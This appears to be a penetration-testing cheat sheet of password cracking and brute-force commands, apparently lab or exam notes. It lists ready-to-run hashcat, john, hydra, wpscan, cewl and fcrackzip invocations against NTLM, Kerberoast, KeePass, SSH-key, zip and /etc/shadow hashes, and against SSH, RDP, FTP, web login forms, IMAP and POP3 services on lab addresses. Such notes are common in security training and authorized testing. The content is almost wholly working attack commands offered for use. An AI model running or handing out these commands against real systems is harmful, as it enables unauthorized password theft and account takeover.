Password Brute Forcing
Hashcat Cracking
External Hashcat Wiki
#external_hashcat_wiki
Cracking with Hashcat
#common_hashcat
NTLM Cracking
hashcat -m 1000 james.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --forceMultiple NTLM files
hashcat -m 1000 -a 0 -o cracked.txt ./*.ntlm /usr/share/wordlists/rockyou.txtNTLM-v2 Cracking
hashcat -m 5600 -a 0 -o cracked.txt ./*.ntlm /usr/share/wordlists/rockyou.txtKerberoast Ticket Hash
Kerberoasted TGS tickets are typically in the RC4-HMAC encryption format
sudo hashcat -m 13100 hashes.kerberoast2 /usr/share/wordlists/rockyou.txt --forceKeepass Cracking
transform the DB file into a hash
keepass2john Database.kdbx > keepass.hashremove the Database word
sed -i 's/Database://g' keepass.hashStart cracking
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --forcewe might sometimes need a different wordlist like fasttrack
hashcat -m 13400 keepass.hash /usr/share/wordlists/fasttrack.txt --forceRSA/OpenSSH Private Keys
hashcat -m 22921 ssh.hash ssh.passwords -r ssh.rule --forceHydra Brute Forcing
#hydra
SSH Brute Forcing
Brute forcing the SSH password for the user george using rockyou as a wordlist
hydra -l james -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.158.201RDP Brute Forcing
Brute forcing the list of names names.txt using a single password.
hydra -L ./names.txt -p "Password123#" rdp://192.168.158.201FTP Brute Forcing
Brute forcing one account with a wordlist.
hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 21 ftp://192.168.158.202Post Login Form Brute Forcing
hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.158.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"Multiple usernames, multiples passwords
hydra -L names.txt -P /usr/share/wordlists/rockyou.txt git.lab.io http-post-form "/user/login:user_name=^USER^&password=^PASS^:Username or password is incorrect."Using a custom port:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.211.29 -s 8089 http-post-form "/login.php:user=admin&pass=^PASS^&submit=Login:Password incorrect." -vBasic Login Form Brute Forcing
hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 80 -f 192.168.158.201 http-get /https://tylerrockwell.github.io/defeating-basic-auth-with-hydra/
IMAP/POP3 Brute Forcing
Create a users passwords pair from a users.txt list
paste -d ':' users.txt users.txt > combined.txtBrute force using that list (-f stops at the first match, -V for verbose)
hydra -C combined.txt 192.168.245.137 imap -V -fRegular Brute forcing:
hydra -L users.txt -P users.txt 192.168.245.137 pop3 -V -fWordlist Generation
Cewl password generator that parses web pages to extract keywords that could be passwords
cewl -d 5 http://postfish.off/team.html -w pop_passwords.txtWpscan Brute Forcing
wpscan --url http://192.168.167.166 --disable-tls-checks -U users.txt -P /usr/share/wordlists/rockyou.txtZip file Cracking
Check zip info, like encryption type
zipinfo -v secret.zipusing #john
zip2john secret.zip > secret.hashusing #fcrackzip
fcrackzip -D -p /usr/share/wordlists/rockyou.txt secret.zipLinux password cracking
Direct method (Single user)
We copy the full user + hash line in /etc/shadow file
# Line from /etc/shadow
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::Then crack it with john
john --wordlist=/usr/share/wordlists/rockyou.txt sammy.hashUnshadow method (multiple passwords)
We’ll get the contents of both /etc/passwd and /etc/shadow then create a passwords file using unshadow (we start by inputting the passwd file then the shadow file)
# creating the passwords file
unshadow passwd shadow > passwordsThen proceed with cracking the passwords file
john --wordlist=/usr/share/wordlists/rockyou.txt passwordsWe can see the cracked hashes with
john --show passwordsVNC password cracking
before we can use the vncpwd tool to crack the vnc password, we need to transform the hash to a .bin file so that vncpwd gets a real binary password file just like ~/.vnc/passwd and it works correctly.
echo BFE625DE518C335B | xxd -r -p > vncpass.bin